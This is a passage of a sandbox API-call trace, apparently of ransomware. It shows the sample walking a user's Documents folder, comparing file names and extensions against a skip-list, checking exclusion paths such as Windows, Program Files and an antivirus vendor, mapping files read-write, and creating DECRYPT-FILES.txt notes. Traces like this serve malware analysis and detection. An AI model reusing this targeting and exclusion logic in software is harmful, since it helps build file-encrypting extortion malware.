lstrcmpiW (lpString1="lZvocw", lpString2="dll") returned 1 [0184.804] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 40 [0184.804] lstrlenW (lpString="-_DUtxFwiSOA_.ods.lZvocw") returned 24 [0184.804] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0184.804] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="-_DUtxFwiSOA_.ods.lZvocw" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-_DUtxFwiSOA_.ods.lZvocw") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-_DUtxFwiSOA_.ods.lZvocw" [0184.804] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.804] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-_DUtxFwiSOA_.ods.lZvocw" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\-_dutxfwisoa_.ods.lzvocw"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c [0184.805] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0x36fe4a0 | out: lpFileSize=0x36fe4a0*=27191) returned 1 [0184.805] CreateFileMappingW (hFile=0x25c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x260 [0184.805] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.806] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.806] CloseHandle (hObject=0x260) returned 1 [0184.806] CloseHandle (hObject=0x25c) returned 1 [0184.806] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.810] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf0daaea0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xf0daaea0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf0daaea0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0184.810] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0184.810] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0184.810] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0184.810] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0184.810] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0184.810] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0184.810] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0184.810] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0184.810] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0184.811] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0184.811] lstrlenW (lpString="0a16c9.tmp") returned 10 [0184.811] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0184.811] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0184.811] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0184.811] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0184.811] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 40 [0184.811] lstrlenW (lpString="0a16c9.tmp") returned 10 [0184.811] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0184.811] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0a16c9.tmp" [0184.811] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.811] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0184.811] CloseHandle (hObject=0x0) returned 0 [0184.811] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.811] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c665660, ftCreationTime.dwHighDateTime=0x1d57f63, ftLastAccessTime.dwLowDateTime=0xae2f6a50, ftLastAccessTime.dwHighDateTime=0x1d57589, ftLastWriteTime.dwLowDateTime=0xae1a3e00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x4b09, dwReserved0=0x0, dwReserved1=0x0, cFileName="0Vab-9jdPOdBqrE6M.pptx.xepV", cAlternateFileName="0VAB-9~1.XEP")) returned 1 [0184.811] lstrcmpiW (lpString1="0Vab-9jdPOdBqrE6M.pptx.xepV", lpString2="DECRYPT-FILES.txt") returned -1 [0184.811] lstrcmpiW (lpString1="0Vab-9jdPOdBqrE6M.pptx.xepV", lpString2="autorun.inf") returned -1 [0184.811] lstrcmpiW (lpString1="0Vab-9jdPOdBqrE6M.pptx.xepV", lpString2="boot.ini") returned -1 [0184.812] lstrcmpiW (lpString1="0Vab-9jdPOdBqrE6M.pptx.xepV", lpString2="desktop.ini") returned -1 [0184.812] lstrcmpiW (lpString1="0Vab-9jdPOdBqrE6M.pptx.xepV", lpString2="ntuser.dat") returned -1 [0184.812] lstrcmpiW (lpString1="0Vab-9jdPOdBqrE6M.pptx.xepV", lpString2="iconcache.db") returned -1 [0184.812] lstrcmpiW (lpString1="0Vab-9jdPOdBqrE6M.pptx.xepV", lpString2="bootsect.bak") returned -1 [0184.812] lstrcmpiW (lpString1="0Vab-9jdPOdBqrE6M.pptx.xepV", lpString2="ntuser.dat.log") returned -1 [0184.812] lstrcmpiW (lpString1="0Vab-9jdPOdBqrE6M.pptx.xepV", lpString2="thumbs.db") returned -1 [0184.812] lstrcmpiW (lpString1="0Vab-9jdPOdBqrE6M.pptx.xepV", lpString2="Bootfont.bin") returned -1 [0184.812] lstrlenW (lpString="0Vab-9jdPOdBqrE6M.pptx.xepV") returned 27 [0184.812] lstrcmpiW (lpString1="xepV", lpString2="lnk") returned 1 [0184.812] lstrcmpiW (lpString1="xepV", lpString2="exe") returned 1 [0184.812] lstrcmpiW (lpString1="xepV", lpString2="sys") returned 1 [0184.812] lstrcmpiW (lpString1="xepV", lpString2="dll") returned 1 [0184.812] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 40 [0184.812] lstrlenW (lpString="0Vab-9jdPOdBqrE6M.pptx.xepV") returned 27 [0184.812] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0184.812] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="0Vab-9jdPOdBqrE6M.pptx.xepV" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0Vab-9jdPOdBqrE6M.pptx.xepV") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0Vab-9jdPOdBqrE6M.pptx.xepV" [0184.812] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.812] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0Vab-9jdPOdBqrE6M.pptx.xepV" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\0vab-9jdpodbqre6m.pptx.xepv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c [0184.812] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0x36fe4a0 | out: lpFileSize=0x36fe4a0*=19209) returned 1 [0184.812] CreateFileMappingW (hFile=0x25c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x260 [0184.813] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.814] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.814] CloseHandle (hObject=0x260) returned 1 [0184.814] CloseHandle (hObject=0x25c) returned 1 [0184.814] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.814] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43875970, ftCreationTime.dwHighDateTime=0x1d5461c, ftLastAccessTime.dwLowDateTime=0x8d2a4010, ftLastAccessTime.dwHighDateTime=0x1d5221d, ftLastWriteTime.dwLowDateTime=0xae1c9f60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x1633a, dwReserved0=0x0, dwReserved1=0x0, cFileName="5zUARQ_fQofL.xlsx.IYvw", cAlternateFileName="5ZUARQ~1.IYV")) returned 1 [0184.814] lstrcmpiW (lpString1="5zUARQ_fQofL.xlsx.IYvw", lpString2="DECRYPT-FILES.txt") returned -1 [0184.814] lstrcmpiW (lpString1="5zUARQ_fQofL.xlsx.IYvw", lpString2="autorun.inf") returned -1 [0184.814] lstrcmpiW (lpString1="5zUARQ_fQofL.xlsx.IYvw", lpString2="boot.ini") returned -1 [0184.814] lstrcmpiW (lpString1="5zUARQ_fQofL.xlsx.IYvw", lpString2="desktop.ini") returned -1 [0184.814] lstrcmpiW (lpString1="5zUARQ_fQofL.xlsx.IYvw", lpString2="ntuser.dat") returned -1 [0184.815] lstrcmpiW (lpString1="5zUARQ_fQofL.xlsx.IYvw", lpString2="iconcache.db") returned -1 [0184.815] lstrcmpiW (lpString1="5zUARQ_fQofL.xlsx.IYvw", lpString2="bootsect.bak") returned -1 [0184.815] lstrcmpiW (lpString1="5zUARQ_fQofL.xlsx.IYvw", lpString2="ntuser.dat.log") returned -1 [0184.815] lstrcmpiW (lpString1="5zUARQ_fQofL.xlsx.IYvw", lpString2="thumbs.db") returned -1 [0184.815] lstrcmpiW (lpString1="5zUARQ_fQofL.xlsx.IYvw", lpString2="Bootfont.bin") returned -1 [0184.815] lstrlenW (lpString="5zUARQ_fQofL.xlsx.IYvw") returned 22 [0184.815] lstrcmpiW (lpString1="IYvw", lpString2="lnk") returned -1 [0184.815] lstrcmpiW (lpString1="IYvw", lpString2="exe") returned 1 [0184.815] lstrcmpiW (lpString1="IYvw", lpString2="sys") returned -1 [0184.815] lstrcmpiW (lpString1="IYvw", lpString2="dll") returned 1 [0184.815] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 40 [0184.815] lstrlenW (lpString="5zUARQ_fQofL.xlsx.IYvw") returned 22 [0184.815] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0184.815] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="5zUARQ_fQofL.xlsx.IYvw" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5zUARQ_fQofL.xlsx.IYvw") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5zUARQ_fQofL.xlsx.IYvw" [0184.815] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.815] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5zUARQ_fQofL.xlsx.IYvw" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\5zuarq_fqofl.xlsx.iyvw"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c [0184.815] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0x36fe4a0 | out: lpFileSize=0x36fe4a0*=90938) returned 1 [0184.815] CreateFileMappingW (hFile=0x25c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x260 [0184.815] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.831] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.831] CloseHandle (hObject=0x260) returned 1 [0184.831] CloseHandle (hObject=0x25c) returned 1 [0184.831] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.831] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x781ccbf0, ftCreationTime.dwHighDateTime=0x1d4c630, ftLastAccessTime.dwLowDateTime=0x2b0a77a0, ftLastAccessTime.dwHighDateTime=0x1d4d3b3, ftLastWriteTime.dwLowDateTime=0xae1f00c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x4391, dwReserved0=0x0, dwReserved1=0x0, cFileName="94tBqj 9I.csv.fTrj", cAlternateFileName="94TBQJ~1.FTR")) returned 1 [0184.831] lstrcmpiW (lpString1="94tBqj 9I.csv.fTrj", lpString2="DECRYPT-FILES.txt") returned -1 [0184.831] lstrcmpiW (lpString1="94tBqj 9I.csv.fTrj", lpString2="autorun.inf") returned -1 [0184.831] lstrcmpiW (lpString1="94tBqj 9I.csv.fTrj", lpString2="boot.ini") returned -1 [0184.831] lstrcmpiW (lpString1="94tBqj 9I.csv.fTrj", lpString2="desktop.ini") returned -1 [0184.831] lstrcmpiW (lpString1="94tBqj 9I.csv.fTrj", lpString2="ntuser.dat") returned -1 [0184.831] lstrcmpiW (lpString1="94tBqj 9I.csv.fTrj", lpString2="iconcache.db") returned -1 [0184.832] lstrcmpiW (lpString1="94tBqj 9I.csv.fTrj", lpString2="bootsect.bak") returned -1 [0184.832] lstrcmpiW (lpString1="94tBqj 9I.csv.fTrj", lpString2="ntuser.dat.log") returned -1 [0184.832] lstrcmpiW (lpString1="94tBqj 9I.csv.fTrj", lpString2="thumbs.db") returned -1 [0184.832] lstrcmpiW (lpString1="94tBqj 9I.csv.fTrj", lpString2="Bootfont.bin") returned -1 [0184.832] lstrlenW (lpString="94tBqj 9I.csv.fTrj") returned 18 [0184.832] lstrcmpiW (lpString1="fTrj", lpString2="lnk") returned -1 [0184.832] lstrcmpiW (lpString1="fTrj", lpString2="exe") returned 1 [0184.832] lstrcmpiW (lpString1="fTrj", lpString2="sys") returned -1 [0184.832] lstrcmpiW (lpString1="fTrj", lpString2="dll") returned 1 [0184.832] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 40 [0184.832] lstrlenW (lpString="94tBqj 9I.csv.fTrj") returned 18 [0184.832] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0184.832] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="94tBqj 9I.csv.fTrj" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\94tBqj 9I.csv.fTrj") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\94tBqj 9I.csv.fTrj" [0184.832] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.832] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\94tBqj 9I.csv.fTrj" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\94tbqj 9i.csv.ftrj"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c [0184.832] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0x36fe4a0 | out: lpFileSize=0x36fe4a0*=17297) returned 1 [0184.832] CreateFileMappingW (hFile=0x25c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x260 [0184.832] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.847] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.847] CloseHandle (hObject=0x260) returned 1 [0184.847] CloseHandle (hObject=0x25c) returned 1 [0184.847] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.847] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf30610, ftCreationTime.dwHighDateTime=0x1d56fa9, ftLastAccessTime.dwLowDateTime=0xbc20e430, ftLastAccessTime.dwHighDateTime=0x1d5360b, ftLastWriteTime.dwLowDateTime=0xae23c380, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x17b13, dwReserved0=0x0, dwReserved1=0x0, cFileName="ASwb1HtgtEQdYep-2.pptx.jB1nu", cAlternateFileName="ASWB1H~1.JB1")) returned 1 [0184.848] lstrcmpiW (lpString1="ASwb1HtgtEQdYep-2.pptx.jB1nu", lpString2="DECRYPT-FILES.txt") returned -1 [0184.848] lstrcmpiW (lpString1="ASwb1HtgtEQdYep-2.pptx.jB1nu", lpString2="autorun.inf") returned -1 [0184.848] lstrcmpiW (lpString1="ASwb1HtgtEQdYep-2.pptx.jB1nu", lpString2="boot.ini") returned -1 [0184.848] lstrcmpiW (lpString1="ASwb1HtgtEQdYep-2.pptx.jB1nu", lpString2="desktop.ini") returned -1 [0184.848] lstrcmpiW (lpString1="ASwb1HtgtEQdYep-2.pptx.jB1nu", lpString2="ntuser.dat") returned -1 [0184.848] lstrcmpiW (lpString1="ASwb1HtgtEQdYep-2.pptx.jB1nu", lpString2="iconcache.db") returned -1 [0184.848] lstrcmpiW (lpString1="ASwb1HtgtEQdYep-2.pptx.jB1nu", lpString2="bootsect.bak") returned -1 [0184.848] lstrcmpiW (lpString1="ASwb1HtgtEQdYep-2.pptx.jB1nu", lpString2="ntuser.dat.log") returned -1 [0184.848] lstrcmpiW (lpString1="ASwb1HtgtEQdYep-2.pptx.jB1nu", lpString2="thumbs.db") returned -1 [0184.848] lstrcmpiW (lpString1="ASwb1HtgtEQdYep-2.pptx.jB1nu", lpString2="Bootfont.bin") returned -1 [0184.848] lstrlenW (lpString="ASwb1HtgtEQdYep-2.pptx.jB1nu") returned 28 [0184.848] lstrcmpiW (lpString1="jB1nu", lpString2="lnk") returned -1 [0184.848] lstrcmpiW (lpString1="jB1nu", lpString2="exe") returned 1 [0184.848] lstrcmpiW (lpString1="jB1nu", lpString2="sys") returned -1 [0184.848] lstrcmpiW (lpString1="jB1nu", lpString2="dll") returned 1 [0184.848] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 40 [0184.848] lstrlenW (lpString="ASwb1HtgtEQdYep-2.pptx.jB1nu") returned 28 [0184.848] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0184.848] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="ASwb1HtgtEQdYep-2.pptx.jB1nu" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ASwb1HtgtEQdYep-2.pptx.jB1nu") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ASwb1HtgtEQdYep-2.pptx.jB1nu" [0184.848] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.848] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ASwb1HtgtEQdYep-2.pptx.jB1nu" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\aswb1htgteqdyep-2.pptx.jb1nu"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c [0184.849] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0x36fe4a0 | out: lpFileSize=0x36fe4a0*=97043) returned 1 [0184.849] CreateFileMappingW (hFile=0x25c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x260 [0184.849] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.852] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.852] CloseHandle (hObject=0x260) returned 1 [0184.852] CloseHandle (hObject=0x25c) returned 1 [0184.852] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.852] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31e7f3f0, ftCreationTime.dwHighDateTime=0x1d4c9b7, ftLastAccessTime.dwLowDateTime=0xae4e9c40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xae4e9c40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CySgPL_RS7_GjN8uh", cAlternateFileName="CYSGPL~1")) returned 1 [0184.852] lstrcmpW (lpString1="CySgPL_RS7_GjN8uh", lpString2=".") returned 1 [0184.852] lstrcmpW (lpString1="CySgPL_RS7_GjN8uh", lpString2="..") returned 1 [0184.853] lstrcatW (in: lpString1="CySgPL_RS7_GjN8uh", lpString2="\\" | out: lpString1="CySgPL_RS7_GjN8uh\\") returned="CySgPL_RS7_GjN8uh\\" [0184.853] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="CySgPL_RS7_GjN8uh\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\" [0184.853] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\", lpSrch="\\Program Files") returned 0x0 [0184.853] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\", lpSrch=":\\Windows") returned 0x0 [0184.853] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\", lpSrch="\\Games\\") returned 0x0 [0184.853] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\", lpSrch="\\Tor Browser\\") returned 0x0 [0184.853] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\", lpSrch="\\ProgramData\\") returned 0x0 [0184.853] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0184.853] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0184.853] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0184.853] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\", lpSrch="\\All Users") returned 0x0 [0184.853] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\", lpSrch="\\IETldCache\\") returned 0x0 [0184.853] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\", lpSrch="\\Local Settings\\") returned 0x0 [0184.853] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\", lpSrch="\\AppData\\Local") returned 0x0 [0184.853] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\", lpSrch="AhnLab") returned 0x0 [0184.853] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0184.853] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\") returned 58 [0184.853] lstrlenW (lpString="0a16c9.tmp") returned 10 [0184.853] wsprintfW (in: param_1=0x36fea6c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\\\0a16c9.tmp") returned 69 [0184.853] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cysgpl_rs7_gjn8uh\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x25c [0184.867] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\") returned 58 [0184.867] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0184.867] wsprintfW (in: param_1=0x36fea6c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\\\DECRYPT-FILES.txt") returned 76 [0184.867] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cysgpl_rs7_gjn8uh\\decrypt-files.txt"), 